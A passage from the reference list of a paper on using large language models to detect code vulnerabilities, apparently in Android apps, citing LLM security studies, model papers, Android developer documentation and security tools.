[20] Gustavo Sandoval, Hammond Pearce, Teo Nys, Ramesh Karri, Siddharth Garg, and Brendan Dolan-Gavitt. Lost at C: A User Study on the Security Implications of Large Language Model Code Assistants. In 32nd USENIX Security Symposium (USENIX Security 23), pages 2205–2222, Anaheim, CA, August 2023. USENIX Association.
[21] Puzhuo Liu, Chengnian Sun, Yaowen Zheng, Xuan Feng, Chuan Qin, Yuncheng Wang, Zhi Li, and Limin Sun. Harnessing the power of llm to support binary taint analysis, 2023.
[22] Jin Wang, Zishan Huang, Hengli Liu, Nianyi Yang, and Yinhao Xiao. Defecthunter: A novel llm-driven boosted-conformer-based code vulnerability detection mechanism, 2023.
[23] Anton Cheshkov, Pavel Zadorozhny, and Rodion Levichev. Evaluation of chatgpt model for vulnerability detection, 2023.
[24] David Noever. Can large language models find and fix vulnerable software?, 2023.
[25] Yuqiang Sun, Daoyuan Wu, Yue Xue, Han Liu, Wei Ma, Lyuye Zhang, Miaolei Shi, and Yang Liu. Llm4vuln: A unified evaluation framework for decoupling and enhancing llms’ vulnerability reasoning, 2024.
[26] Sihao Hu, Tiansheng Huang, Fatih İlhan, Selim Furkan Tekin, and Ling Liu. Large language model-powered smart contract vulnerability detection: New perspectives, 2023.
[27] Janaka Senanayake., Harsha Kalutarage., Mhd Omar Al-Kadri., Luca Piras., and Andrei Petrovski. Labelled vulnerability dataset on android source code (lvdandro) to develop ai-based code vulnerability detection models. In Proceedings of the 20th International Conference on Security and Cryptography - SECRYPT, pages 659–666. INSTICC, SciTePress, 2023.
[28] Vulcorpus-2024. https://github.com/billkoul/vulcorpus-2024. last visited 10/3/2024.
[29] Android developers - manifest permissions. https://developer.android.com/reference/android/Manifest.permission#ACCESS_FINE_LOCATION. last visited 10/3/2024.
[30] Android developers - mediastore. https://developer.android.com/reference/android/provider/MediaStore#ACTION_IMAGE_CAPTURE. last visited 10/3/2024.
[31] Android developers - intent. https://developer.android.com/reference/android/content/Intent#ACTION_OPEN_DOCUMENT. last visited 10/3/2024.
[32] What we know about the xz utils backdoor that almost infected the world. https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/. last visited 17/4/2024.
[33] Tom B. Brown et al. Language models are few-shot learners, 2020.
[34] OpenAI. GPT-4 is OpenAI’s most advanced system, producing safer and more useful responses, 2024. last visited 10/3/2024.
[35] OpenAI. Gpt-4 technical report, 2024.
[36] Hugo Touvron et al. Llama 2: Open foundation and fine-tuned chat models, 2023.
[37] Lewis Tunstall, Edward Beeching, Nathan Lambert, Nazneen Rajani, Kashif Rasul, Younes Belkada, Shengyi Huang, Leandro von Werra, Clémentine Fourrier, Nathan Habib, Nathan Sarrazin, Omar Sanseviero, Alexander M. Rush, and Thomas Wolf. Zephyr: Direct distillation of lm alignment, 2023.
[38] Nous hermes 2 mixtral 8x7b dpo. /urlhttps://huggingface.co/NousResearch/Nous-Hermes-2-Mixtral-8x7B-DPO. last visited 10/3/2024.
[39] Wing Lian, Bleys Goodson, Guan Wang, Eugene Pentland, Austin Cook, Chanvichet Vong, and “Teknium”. Mistralorca: Mistral-7b model instruct-tuned on filtered openorcav1 gpt-4 dataset, 2023. last visited 10/3/2024.
[40] Subhabrata Mukherjee, Arindam Mitra, Ganesh Jawahar, Sahaj Agarwal, Hamid Palangi, and Ahmed Awadallah. Orca: Progressive learning from complex explanation traces of gpt-4, 2023.
[41] Shayne Longpre, Le Hou, Tu Vu, Albert Webson, Hyung Won Chung, Yi Tay, Denny Zhou, Quoc V. Le, Barret Zoph, Jason Wei, and Adam Roberts. The flan collection: Designing data and methods for effective instruction tuning, 2023.
[42] Code llama. https://ai.meta.com/blog/code-Llama-large-language-model-coding/. last visited 10/3/2024.
[43] Llamaindex. https://docs.llamaindex.ai/en/stable/. last visited 10/3/2024.
[44] Security guidelines. https://developer.android.com/privacy-and-security/security-tips. last visited 10/3/2024.
[45] Mobsf. https://github.com/MobSF/Mobile-Security-Framework-MobSF. last visited 10/3/2024.